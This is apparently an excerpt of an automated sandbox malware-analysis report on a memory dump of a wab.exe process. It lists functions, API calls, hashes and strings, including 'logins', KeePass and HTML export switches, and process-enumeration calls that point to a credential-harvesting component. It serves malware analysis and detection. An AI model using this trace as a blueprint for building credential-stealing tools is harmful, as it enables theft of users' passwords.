                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 2000436516-3842416460
                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1043902810-0
                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                              • memcpy.MSVCRT ref: 0040E3EC
                                                                                              • memcpy.MSVCRT ref: 0040E407
                                                                                              • memcpy.MSVCRT ref: 0040E422
                                                                                              • memcpy.MSVCRT ref: 0040E43D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                              • API String ID: 3073804840-2252543386
                                                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                              • API String ID: 2899246560-1542517562
                                                                                              • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                              • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                              • API String ID: 3330709923-517860148
                                                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                              • _wtoi.MSVCRT ref: 004081AF
                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                              • String ID: logins$null
                                                                                              • API String ID: 3492182834-2163367763
                                                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                              • memset.MSVCRT ref: 00408606
                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                              • _mbscpy.MSVCRT ref: 004086DB
                                                                                              • _mbscpy.MSVCRT ref: 004086FA
                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                              • String ID: ---
                                                                                              • API String ID: 3437578500-2854292027
                                                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                              • memset.MSVCRT ref: 00410892
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1010922700-0
                                                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$FullNamePath$malloc$Version
                                                                                              • String ID: |A
                                                                                              • API String ID: 4233704886-1717621600
                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                              • API String ID: 2081463915-1959339147
                                                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2012295524-70141382
                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                              • API String ID: 667068680-3953557276
                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                              • memcpy.MSVCRT ref: 0041234D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1700100422-0
                                                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
